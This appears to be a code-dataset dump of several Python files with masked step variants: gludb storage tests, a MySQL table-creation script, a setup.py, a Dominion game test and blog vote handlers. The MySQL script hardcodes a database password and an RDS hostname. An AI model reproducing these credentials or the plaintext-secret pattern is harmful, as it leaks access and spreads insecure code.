s.save()\n create2 = parse_now_field(s._create_date)\n update2 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update2)\n self.assertCloseTimes(create1, create2)\n self.assertNotCloseTimes(update1, update2)\n s2 = SimpleStorage.find_one(s.id)\n create3 = parse_now_field(s2._create_date)\n update3 = parse_now_field(s2._last_update)\n self.assertCloseTimes(create2, create3)\n self.assertCloseTimes(update2, update3)\n\n def test_readwrite(self):\n s = SimpleStorage(name='Pre', descrip='Testing', age=-1)\n self.assertEquals('', s.id)\n self.assertEquals('Pre', s.name)\n self.assertEquals('Testing', s.descrip)\n self.assertEquals(-1, s.age)\n self.assertEquals({}, s.extra_data)\n s.extra_data['coolness'] = {'a': 123, 'b': 456}\n s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]\n s.extra_data['oscar'] = 'grouch'\n s.extra_data['fp'] = 42.42\n self.assertTrue(orig_version(s) is None)\n s.save()\n self.assertTrue(len(s.id) > 0)\n self.assertReadable(s)\n self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))\n s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)\n s2.save()\n self.assertReadable(s2)\n all_recs = SimpleStorage.find_all()\n self.assertEqual(1, len(all_recs))\n self.assertObjEq(s2, all_recs[0])\n read_obj = all_recs[0]\n read_obj.name = 'Pre2'\n read_obj.descrip = 'Testing2'\n read_obj.age = -2\n s0 = SimpleStorage.from_data(orig_version(read_obj))\n self.assertEquals(s.id, s0.id)\n self.assertEquals('Post', s0.name)\n self.assertEquals('AtItAgain', s0.descrip)\n self.assertEquals(256, s0.age)\n 
self.assertEquals({}, s0.extra_data)\n\n\nclass SpecificStorageTesting(DefaultStorageTesting):\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n\nclass PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = 'Prefix'\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n\n def test_table_has_prefix(self):\n expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +\n SimpleStorage.__table_name__)\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)\n",
"step-5": "\"\"\"Testing data storage functionality in gludb.simple (see simple_tests.py for\ntesting of the rest of gludb.simple functionality)\"\"\"\n\nimport unittest\nimport datetime\nimport time\n\nimport gludb.config\n\nfrom gludb.versioning import VersioningTypes\nfrom gludb.data import orig_version\nfrom gludb.simple import DBObject, Field\nfrom gludb.utils import parse_now_field\n\nfrom utils import compare_data_objects\n\n\n@DBObject(table_name='SimpleStorageTest', versioning=VersioningTypes.NONE)\nclass SimpleStorage(object):\n name = Field('default name')\n descrip = Field()\n age = Field(42)\n extra_data = Field(dict)\n\n\n# Same tests as DefaultStorageTesting but with differnt setUp/tearDown\nclass MissingMapTesting(unittest.TestCase):\n def setUp(self):\n gludb.config.default_database(None) # no default database\n\n def tearDown(self):\n # Undo any database setup\n gludb.config.clear_database_config()\n\n def test_failedops(self):\n def try_op():\n return gludb.config.get_mapping(SimpleStorage)\n self.assertRaises(ValueError, try_op)\n\n def test_justnomap(self):\n mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)\n self.assertIsNone(mapped)\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n def setUp(self):\n gludb.config.default_database(gludb.config.Database(\n 'sqlite',\n filename=':memory:'\n ))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n # Undo any database setup\n gludb.config.clear_database_config()\n\n def assertObjEq(self, obj1, obj2):\n self.assertTrue(compare_data_objects(obj1, obj2))\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n \n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.__table_name__)\n\n def test_extra_fields(self):\n s = SimpleStorage(name='TimeTracking', descrip='FirstSave')\n s.save()\n\n create1 = parse_now_field(s._create_date)\n update1 = parse_now_field(s._last_update)\n\n self.assertCloseTimes(datetime.datetime.utcnow(), update1)\n self.assertCloseTimes(create1, update1)\n\n # Sucks, but we need to space out our timestamps\n time.sleep(0.3)\n\n s.descrip = 'SecondSave'\n s.save()\n\n create2 = parse_now_field(s._create_date)\n update2 = parse_now_field(s._last_update)\n\n self.assertCloseTimes(datetime.datetime.utcnow(), update2)\n self.assertCloseTimes(create1, create2)\n self.assertNotCloseTimes(update1, update2)\n\n s2 = SimpleStorage.find_one(s.id)\n create3 = parse_now_field(s2._create_date)\n update3 = parse_now_field(s2._last_update)\n\n # Note that we DON'T check for string equality - that's because\n # _last_update is updated every time the instance method to_data is\n # called. 
See simple.md for extra details on auto fields\n self.assertCloseTimes(create2, create3)\n self.assertCloseTimes(update2, update3)\n\n def test_readwrite(self):\n s = SimpleStorage(name='Pre', descrip='Testing', age=-1)\n self.assertEquals('', s.id)\n self.assertEquals('Pre', s.name)\n self.assertEquals('Testing', s.descrip)\n self.assertEquals(-1, s.age)\n self.assertEquals({}, s.extra_data)\n\n s.extra_data['coolness'] = {'a': 123, 'b': 456}\n s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]\n s.extra_data['oscar'] = 'grouch'\n s.extra_data['fp'] = 42.42\n\n self.assertTrue(orig_version(s) is None)\n\n s.save()\n self.assertTrue(len(s.id) > 0)\n self.assertReadable(s)\n # Saved - so should have a prev version that is identical\n self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))\n\n s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)\n s2.save()\n self.assertReadable(s2)\n\n all_recs = SimpleStorage.find_all()\n self.assertEqual(1, len(all_recs))\n self.assertObjEq(s2, all_recs[0])\n\n # Change the object we read and then insure that the pervious version\n # saved on load is correct\n read_obj = all_recs[0]\n read_obj.name = 'Pre2'\n read_obj.descrip = 'Testing2'\n read_obj.age = -2\n\n s0 = SimpleStorage.from_data(orig_version(read_obj))\n self.assertEquals(s.id, s0.id)\n self.assertEquals('Post', s0.name)\n self.assertEquals('AtItAgain', s0.descrip)\n self.assertEquals(256, s0.age)\n self.assertEquals({}, s0.extra_data)\n\n\n# Same tests as DefaultStorageTesting but with differnt setUp/tearDown\nclass SpecificStorageTesting(DefaultStorageTesting):\n def setUp(self):\n gludb.config.default_database(None) # no default database\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite',\n filename=':memory:'\n ))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n # Undo any database setup\n gludb.config.clear_database_config()\n\n \n# Same tests as DefaultStorageTesting but with differnt setUp/tearDown\nclass PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = \"Prefix\"\n \n def setUp(self):\n gludb.config.default_database(None) # no default database\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite',\n filename=':memory:'\n ))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n # Undo any database setup\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n \n def test_table_has_prefix(self):\n expectedName = self.PREFIX + gludb.config._APPLICATION_SEP + SimpleStorage.__table_name__\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)",
"step-ids": [
16,
21,
24,
25,
28
]
}
|
[
16,
21,
24,
25,
28
] |
import requests
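# Smoke test: assumes a service is already listening on localhost:5000,
# exposing POST /save (JSON body) and GET /read.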
save_result = requests.post('http://localhost:5000/save', json={'value':
'witam'})
print(save_result.text)
read_result = requests.get('http://localhost:5000/read')
print(read_result.text)
|
normal
|
{
"blob_id": "43362c564be0dfbc8f246a0589bcebde245ab7b5",
"index": 7015,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(save_result.text)\n<mask token>\nprint(read_result.text)\n",
"step-3": "<mask token>\nsave_result = requests.post('http://localhost:5000/save', json={'value':\n 'witam'})\nprint(save_result.text)\nread_result = requests.get('http://localhost:5000/read')\nprint(read_result.text)\n",
"step-4": "import requests\nsave_result = requests.post('http://localhost:5000/save', json={'value':\n 'witam'})\nprint(save_result.text)\nread_result = requests.get('http://localhost:5000/read')\nprint(read_result.text)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import mysql.connector
from mysql.connector import errorcode
DB_NAME = 'PieDB'
TABLES = {}
# TABLES['pietweets'] = (
# "CREATE TABLE `pietweets` ("
# " `id` int NOT NULL AUTO_INCREMENT,"
# " `tweet_id` bigint NOT NULL,"
# " `username` varchar(32) NOT NULL,"
# " `geo_lat` float(53) NOT NULL,"
# " `geo_long` float(53) NOT NULL,"
# " `text` varchar(255) NOT NULL,"
# " `timestamp` datetime NOT NULL,"
# " PRIMARY KEY (`id`)"
# ") ENGINE=InnoDB")
TABLES['lemonpie'] = (
"CREATE TABLE `lemonpie` ("
" `id` int NOT NULL AUTO_INCREMENT,"
" `tweet_id` bigint NOT NULL,"
" `username` varchar(32) NOT NULL,"
" `geo_lat` float(53) NOT NULL,"
" `geo_long` float(53) NOT NULL,"
" `text` varchar(255) NOT NULL,"
" `timestamp` datetime NOT NULL,"
" PRIMARY KEY (`id`)"
") ENGINE=InnoDB")
# DB credentials
config = {
'user': 'piemaster',
'password': 'piemaster123',
'host': 'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com',
'database': 'PieDB',
'raise_on_warnings': True,
}
# establish connection with DB config credentials
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
def create_database(cursor):
try:
cursor.execute(
"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'".format(DB_NAME))
except mysql.connector.Error as err:
print("Failed creating database: {}".format(err))
exit(1)
# try connecting to the designated DB; if it does not exist, create it
try:
cnx.database = DB_NAME
except mysql.connector.Error as err:
if err.errno == errorcode.ER_BAD_DB_ERROR:
create_database(cursor)
cnx.database = DB_NAME
else:
print(err)
exit(1)
# iterate through TABLES and create each table
for name, ddl in TABLES.items():
try:
print("Creating table {}: ".format(name))
cursor.execute(ddl)
except mysql.connector.Error as err:
if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:
print("already exists.")
else:
print(err.msg)
else:
print("OK")
# closing db connection
cursor.close()
cnx.close()
|
normal
|
{
"blob_id": "38abc4bc99f3b15b416c77481818464a6c7f11ef",
"index": 3844,
"step-1": "<mask token>\n\n\ndef create_database(cursor):\n try:\n cursor.execute(\"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".\n format(DB_NAME))\n except mysql.connector.Error as err:\n print('Failed creating database: {}'.format(err))\n exit(1)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_database(cursor):\n try:\n cursor.execute(\"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".\n format(DB_NAME))\n except mysql.connector.Error as err:\n print('Failed creating database: {}'.format(err))\n exit(1)\n\n\ntry:\n cnx.database = DB_NAME\nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor)\n cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\nfor name, ddl in TABLES.iteritems():\n try:\n print('Creating table {}: '.format(name))\n cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print('already exists.')\n else:\n print(err.msg)\n else:\n print('OK')\ncursor.close()\ncnx.close()\n",
"step-3": "<mask token>\nDB_NAME = 'PieDB'\nTABLES = {}\nTABLES['lemonpie'] = (\n 'CREATE TABLE `lemonpie` ( `id` int NOT NULL AUTO_INCREMENT, `tweet_id` bigint NOT NULL, `username` varchar(32) NOT NULL, `geo_lat` float(53) NOT NULL, `geo_long` float(53) NOT NULL, `text` varchar(255) NOT NULL, `timestamp` datetime NOT NULL, PRIMARY KEY (`id`)) ENGINE=InnoDB'\n )\nconfig = {'user': 'piemaster', 'password': 'piemaster123', 'host':\n 'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com', 'database': 'PieDB',\n 'raise_on_warnings': True}\ncnx = mysql.connector.connect(**config)\ncursor = cnx.cursor()\n\n\ndef create_database(cursor):\n try:\n cursor.execute(\"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".\n format(DB_NAME))\n except mysql.connector.Error as err:\n print('Failed creating database: {}'.format(err))\n exit(1)\n\n\ntry:\n cnx.database = DB_NAME\nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor)\n cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\nfor name, ddl in TABLES.iteritems():\n try:\n print('Creating table {}: '.format(name))\n cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print('already exists.')\n else:\n print(err.msg)\n else:\n print('OK')\ncursor.close()\ncnx.close()\n",
"step-4": "import mysql.connector\nfrom mysql.connector import errorcode\nDB_NAME = 'PieDB'\nTABLES = {}\nTABLES['lemonpie'] = (\n 'CREATE TABLE `lemonpie` ( `id` int NOT NULL AUTO_INCREMENT, `tweet_id` bigint NOT NULL, `username` varchar(32) NOT NULL, `geo_lat` float(53) NOT NULL, `geo_long` float(53) NOT NULL, `text` varchar(255) NOT NULL, `timestamp` datetime NOT NULL, PRIMARY KEY (`id`)) ENGINE=InnoDB'\n )\nconfig = {'user': 'piemaster', 'password': 'piemaster123', 'host':\n 'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com', 'database': 'PieDB',\n 'raise_on_warnings': True}\ncnx = mysql.connector.connect(**config)\ncursor = cnx.cursor()\n\n\ndef create_database(cursor):\n try:\n cursor.execute(\"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".\n format(DB_NAME))\n except mysql.connector.Error as err:\n print('Failed creating database: {}'.format(err))\n exit(1)\n\n\ntry:\n cnx.database = DB_NAME\nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor)\n cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\nfor name, ddl in TABLES.iteritems():\n try:\n print('Creating table {}: '.format(name))\n cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print('already exists.')\n else:\n print(err.msg)\n else:\n print('OK')\ncursor.close()\ncnx.close()\n",
"step-5": "import mysql.connector\nfrom mysql.connector import errorcode\n\nDB_NAME = 'PieDB'\n\nTABLES = {}\n# TABLES['pietweets'] = (\n# \t\"CREATE TABLE `pietweets` (\"\n# \t\" `id` int NOT NULL AUTO_INCREMENT,\"\t\t\n# \t\" `tweet_id` bigint NOT NULL,\"\n# \t\" `username` varchar(32) NOT NULL,\"\n# \t\" `geo_lat` float(53) NOT NULL,\"\n# \t\" `geo_long` float(53) NOT NULL,\"\n# \t\" `text` varchar(255) NOT NULL,\"\n# \t\" `timestamp` datetime NOT NULL,\"\n# \t\" PRIMARY KEY (`id`)\"\n# \t\") ENGINE=InnoDB\")\nTABLES['lemonpie'] = (\n \"CREATE TABLE `lemonpie` (\"\n \" `id` int NOT NULL AUTO_INCREMENT,\" \n \" `tweet_id` bigint NOT NULL,\"\n \" `username` varchar(32) NOT NULL,\"\n \" `geo_lat` float(53) NOT NULL,\"\n \" `geo_long` float(53) NOT NULL,\"\n \" `text` varchar(255) NOT NULL,\"\n \" `timestamp` datetime NOT NULL,\"\n \" PRIMARY KEY (`id`)\"\n \") ENGINE=InnoDB\")\n\n# DB credentials\nconfig = {\n 'user': 'piemaster',\n 'password': 'piemaster123',\n 'host': 'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com',\n 'database': 'PieDB',\n 'raise_on_warnings': True,\n}\n\n# establish connection with DB config credentials\ncnx = mysql.connector.connect(**config)\ncursor = cnx.cursor()\n\ndef create_database(cursor):\n try:\n cursor.execute(\n \"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".format(DB_NAME))\n except mysql.connector.Error as err:\n print(\"Failed creating database: {}\".format(err))\n exit(1)\n\n# try connecting to designated DB, if not exist - create this DB\ntry:\n cnx.database = DB_NAME \nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor)\n cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\n\n# iterate through TABLES and create each table\nfor name, ddl in TABLES.iteritems():\n try:\n print(\"Creating table {}: \".format(name))\n cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"already exists.\")\n else:\n print(err.msg)\n else:\n print(\"OK\")\n\n# closing db connection\ncursor.close()\ncnx.close()\n\n\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
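A side note on the DB record above: the connection credentials are hardcoded in source. A minimal sketch of the same config pulled from the environment instead (the variable names here are illustrative assumptions, not part of the original record):

import os

config = {
    'user': os.environ['PIEDB_USER'],          # assumed variable names
    'password': os.environ['PIEDB_PASSWORD'],
    'host': os.environ.get('PIEDB_HOST', 'localhost'),
    'database': os.environ.get('PIEDB_NAME', 'PieDB'),
    'raise_on_warnings': True,
}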
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
setup(name='nodepool_harness', version='0.1dev', description=
'Nodepool harness', packages=['nodepool_harness', 'statsd',
'apscheduler'], install_requires=['PyYAML', 'python-novaclient',
'paramiko', 'sqlalchemy'], entry_points={'console_scripts': [
'nh-install-node = nodepool_harness.scripts:install_node']})
<|reserved_special_token_1|>
from setuptools import setup
setup(name='nodepool_harness', version='0.1dev', description=
'Nodepool harness', packages=['nodepool_harness', 'statsd',
'apscheduler'], install_requires=['PyYAML', 'python-novaclient',
'paramiko', 'sqlalchemy'], entry_points={'console_scripts': [
'nh-install-node = nodepool_harness.scripts:install_node']})
<|reserved_special_token_1|>
from setuptools import setup
setup(
name='nodepool_harness',
version='0.1dev',
description='Nodepool harness',
packages=['nodepool_harness', 'statsd', 'apscheduler'],
install_requires=["PyYAML", "python-novaclient", "paramiko", "sqlalchemy"],
entry_points = {
'console_scripts': [
'nh-install-node = nodepool_harness.scripts:install_node',
]
}
)
|
flexible
|
{
"blob_id": "61ff5fae02d18d51595e8050d97244574e7d8af1",
"index": 6419,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='nodepool_harness', version='0.1dev', description=\n 'Nodepool harness', packages=['nodepool_harness', 'statsd',\n 'apscheduler'], install_requires=['PyYAML', 'python-novaclient',\n 'paramiko', 'sqlalchemy'], entry_points={'console_scripts': [\n 'nh-install-node = nodepool_harness.scripts:install_node']})\n",
"step-3": "from setuptools import setup\nsetup(name='nodepool_harness', version='0.1dev', description=\n 'Nodepool harness', packages=['nodepool_harness', 'statsd',\n 'apscheduler'], install_requires=['PyYAML', 'python-novaclient',\n 'paramiko', 'sqlalchemy'], entry_points={'console_scripts': [\n 'nh-install-node = nodepool_harness.scripts:install_node']})\n",
"step-4": "from setuptools import setup\n\n\nsetup(\n name='nodepool_harness',\n version='0.1dev',\n description='Nodepool harness',\n packages=['nodepool_harness', 'statsd', 'apscheduler'],\n install_requires=[\"PyYAML\", \"python-novaclient\", \"paramiko\", \"sqlalchemy\"],\n entry_points = {\n 'console_scripts': [\n 'nh-install-node = nodepool_harness.scripts:install_node',\n ]\n }\n)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
testUtility.play_game(supply, supply_order, players, trash)
testUtility.display_game_results(players)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
player_names = ['Annie', '*Ben', '*Carla']
nV, nC = testUtility.set_vc_number(player_names)
box, supply_order = testUtility.define_box(nV)
supply = testUtility.set_supply(box, player_names, nV, nC)
trash = []
supply['Copper'] = [Dominion.Copper()] * (60 - len(player_names) * 7)
supply['Silver'] = [Dominion.Silver()] * 0
supply['Gold'] = [Dominion.Gold()] * 0
players = testUtility.set_players(player_names)
testUtility.play_game(supply, supply_order, players, trash)
testUtility.display_game_results(players)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import Dominion
import testUtility
import random
from collections import defaultdict
player_names = ['Annie', '*Ben', '*Carla']
nV, nC = testUtility.set_vc_number(player_names)
box, supply_order = testUtility.define_box(nV)
supply = testUtility.set_supply(box, player_names, nV, nC)
trash = []
supply['Copper'] = [Dominion.Copper()] * (60 - len(player_names) * 7)
supply['Silver'] = [Dominion.Silver()] * 0
supply['Gold'] = [Dominion.Gold()] * 0
players = testUtility.set_players(player_names)
testUtility.play_game(supply, supply_order, players, trash)
testUtility.display_game_results(players)
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
"""
Created on Saturday, January 18, 2020
@author: lieur
This test case sets silver and gold to 0, which in most cases prevents the computer from
buying provinces. It tests whether the game ends when one more supply card hits 0 (since
silver and gold are already at 0 and the game ends when 3 supply decks hit 0).
"""
import Dominion
import testUtility
import random
from collections import defaultdict
# Get player names
player_names = ["Annie", "*Ben", "*Carla"]
# Set number of curses and victory cards
nV, nC = testUtility.set_vc_number(player_names)
# Define box and supply_order
box, supply_order = testUtility.define_box(nV)
# Choose and set supply cards
supply = testUtility.set_supply(box, player_names, nV, nC)
# Initialize the trash
trash = []
# Test silver and gold = 0
supply["Copper"]=[Dominion.Copper()]*(60-len(player_names)*7)
supply["Silver"]=[Dominion.Silver()]*0
supply["Gold"]=[Dominion.Gold()]*0
# Construct the Player objects
players = testUtility.set_players(player_names)
# Play the game
testUtility.play_game(supply, supply_order, players, trash)
# Final score
testUtility.display_game_results(players)
|
flexible
|
{
"blob_id": "fa833e9cd1e624d9ecfb2fcc6d9e22955c9e4b1e",
"index": 6258,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntestUtility.play_game(supply, supply_order, players, trash)\ntestUtility.display_game_results(players)\n",
"step-3": "<mask token>\nplayer_names = ['Annie', '*Ben', '*Carla']\nnV, nC = testUtility.set_vc_number(player_names)\nbox, supply_order = testUtility.define_box(nV)\nsupply = testUtility.set_supply(box, player_names, nV, nC)\ntrash = []\nsupply['Copper'] = [Dominion.Copper()] * (60 - len(player_names) * 7)\nsupply['Silver'] = [Dominion.Silver()] * 0\nsupply['Gold'] = [Dominion.Gold()] * 0\nplayers = testUtility.set_players(player_names)\ntestUtility.play_game(supply, supply_order, players, trash)\ntestUtility.display_game_results(players)\n",
"step-4": "<mask token>\nimport Dominion\nimport testUtility\nimport random\nfrom collections import defaultdict\nplayer_names = ['Annie', '*Ben', '*Carla']\nnV, nC = testUtility.set_vc_number(player_names)\nbox, supply_order = testUtility.define_box(nV)\nsupply = testUtility.set_supply(box, player_names, nV, nC)\ntrash = []\nsupply['Copper'] = [Dominion.Copper()] * (60 - len(player_names) * 7)\nsupply['Silver'] = [Dominion.Silver()] * 0\nsupply['Gold'] = [Dominion.Gold()] * 0\nplayers = testUtility.set_players(player_names)\ntestUtility.play_game(supply, supply_order, players, trash)\ntestUtility.display_game_results(players)\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\"\nCreated on Saturday, January 18, 2020\n\n@author: lieur\n\nThis test case sets silver and gold to 0, which in most cases prevent the computer from\nbuying provinces. This tests to see if the game ends when one more supply car hits 0 (since\nsilver and gold are already at 0 and the game ends when 3 supply deck hits 0)\n\"\"\"\"\"\n\nimport Dominion\nimport testUtility\nimport random\nfrom collections import defaultdict\n\n# Get player names\nplayer_names = [\"Annie\", \"*Ben\", \"*Carla\"]\n\n# Set number of curses and victory cards\nnV, nC = testUtility.set_vc_number(player_names)\n\n# Define box and supply_order\nbox, supply_order = testUtility.define_box(nV)\n\n\n# Choose and set supply cards\nsupply = testUtility.set_supply(box, player_names, nV, nC)\n\n# Initialize the trash\ntrash = []\n# Test silver and gold = 0\nsupply[\"Copper\"]=[Dominion.Copper()]*(60-len(player_names)*7)\nsupply[\"Silver\"]=[Dominion.Silver()]*0\nsupply[\"Gold\"]=[Dominion.Gold()]*0\n\n# Construct the Player objects\nplayers = testUtility.set_players(player_names)\n\n# Play the game\ntestUtility.play_game(supply, supply_order, players, trash)\n\n# Final score\ntestUtility.display_game_results(players)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# [BEGIN IMPORTS]
from mainhandler import MainHandler
from sec.data import *
# [END IMPORTS]
class UpVoteHandler (MainHandler):
def get(self):
user = self.get_user()
if user:
post_id = self.request.get('post_id')
post = PostData.get_by_id(int(post_id))
voter_list = post.voter_list
if post.author == user:
error = "cant vote for self"
self.render('mainpage.html', error=error)
elif user in voter_list:
error = "cant vote twice"
self.render('mainpage.html', error=error)
else:
post.upscore += 1
voter_list.append(user)
post.put()
self.redirect('/blog/' + post_id)
else:
self.redirect('/')
class DownVoteHandler (MainHandler):
def get(self):
user = self.get_user()
if user:
post_id = self.request.get('post_id')
post = PostData.get_by_id(int(post_id))
voter_list = post.voter_list
if post.author == user:
error = "cant vote for self"
self.render('mainpage.html', error=error)
elif user in voter_list:
error = "cant vote twice"
self.render('mainpage.html', error=error)
else:
post.downscore += 1
voter_list.append(user)
post.put()
self.redirect('/blog/' + post_id)
else:
self.redirect('/')
|
normal
|
{
"blob_id": "5711613df0bda10512466f147febcffacfe1607b",
"index": 7794,
"step-1": "<mask token>\n\n\nclass DownVoteHandler(MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n voter_list = post.voter_list\n if post.author == user:\n error = 'cant vote for self'\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = 'cant vote twice'\n self.render('mainpage.html', error=error)\n else:\n post.downscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n",
"step-2": "<mask token>\n\n\nclass UpVoteHandler(MainHandler):\n <mask token>\n\n\nclass DownVoteHandler(MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n voter_list = post.voter_list\n if post.author == user:\n error = 'cant vote for self'\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = 'cant vote twice'\n self.render('mainpage.html', error=error)\n else:\n post.downscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n",
"step-3": "<mask token>\n\n\nclass UpVoteHandler(MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n voter_list = post.voter_list\n if post.author == user:\n error = 'cant vote for self'\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = 'cant vote twice'\n self.render('mainpage.html', error=error)\n else:\n post.upscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n\n\nclass DownVoteHandler(MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n voter_list = post.voter_list\n if post.author == user:\n error = 'cant vote for self'\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = 'cant vote twice'\n self.render('mainpage.html', error=error)\n else:\n post.downscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n",
"step-4": "from mainhandler import MainHandler\nfrom sec.data import *\n\n\nclass UpVoteHandler(MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n voter_list = post.voter_list\n if post.author == user:\n error = 'cant vote for self'\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = 'cant vote twice'\n self.render('mainpage.html', error=error)\n else:\n post.upscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n\n\nclass DownVoteHandler(MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n voter_list = post.voter_list\n if post.author == user:\n error = 'cant vote for self'\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = 'cant vote twice'\n self.render('mainpage.html', error=error)\n else:\n post.downscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n",
